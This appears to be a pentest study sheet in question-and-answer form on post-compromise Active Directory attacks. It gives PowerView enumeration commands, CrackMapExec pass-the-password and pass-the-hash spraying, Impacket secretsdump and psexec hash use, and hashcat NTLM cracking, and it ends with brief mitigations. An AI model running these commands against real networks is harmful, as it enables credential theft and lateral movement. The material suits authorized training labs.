Post-Compromise Enumeration (Need credentials)

Question 1

Powertools/Powerview (github)

Question 2

PowerSploit/Recon (github)

Question 3

Recon with powerview

Answer 3

Get-NetDomain
Get-NetDomainController
Get-DomainPolicy
(Get-DomainPolicy).”system access”
Get-NetUser
Get-NetUser | select cn
Get-NetUser | select samaccountname
Get-NetUser | select description (password may be)
Get-UserProperty -Properties pwdlastset
Get-UserProperty -Properties logoncount
Get-UserProperty -Properties badpwdcount

Get-NetComputer
Get-NetComputer -FullData

Get-NetComputer -FullData | selec OperatingSystem

Get-NetGroup
Get-NetGroup -GroupName “Domain Admins”
Get-NetGroup -GroupName “admin”
Get-NetGroupMember -GroupName “Domain Admins”

Invoke-ShareFinder

Get-NetGPO
Get-NetGPO | select displayname, whenchanged

Question 4

Pass the password / Pass the Hash (General definition)

Answer 4

If we crack a password and /or dump the SAM hashes, we can leverage both for lateral movement in networks

Question 5

Pass the password

Answer 5

crackmapexec smb IP/CIDR -u user -d domain -p pass

Question 6

Pass the Hash

Answer 6

crackmapexec smb ip/CIDR -u user -H hash –local

Question 7

How dump the NTLM hash of remote windows host with username and passwd ?

Answer 7

secretsdump.py marvel/fcastle:Password1@192.168.56.1
(Impacket script)

Question 8

Crack NTLM / SAM Hash

Answer 8

hashcat -m 1000 hash.txt wordlist.txt -O

Question 9

NTML hash VS NTLMv2 hash

Answer 9

You can pass NTLM hashs but can’t pass NTLMv2 hashs

Question 10

Spray the hash via crackmapexec

Answer 10

crackmapexec smb 192.168.56.1/24 -u “Frank Castle” -H <hash> --local-auth</hash>

Question 11

Find writable share via pass the hash via psexec (Quick win to domain admin control; upload shell)

Answer 11

psexec.py “franck castle”:@192.168.56.1 -hashes <LMHASH:NTHASH></LMHASH:NTHASH>

Question 12

Mitigation pass the password / pass the hash

Answer 12

• Limit account re-use
• Utilize strong passwords
• Privilege Access Managemement (PAM)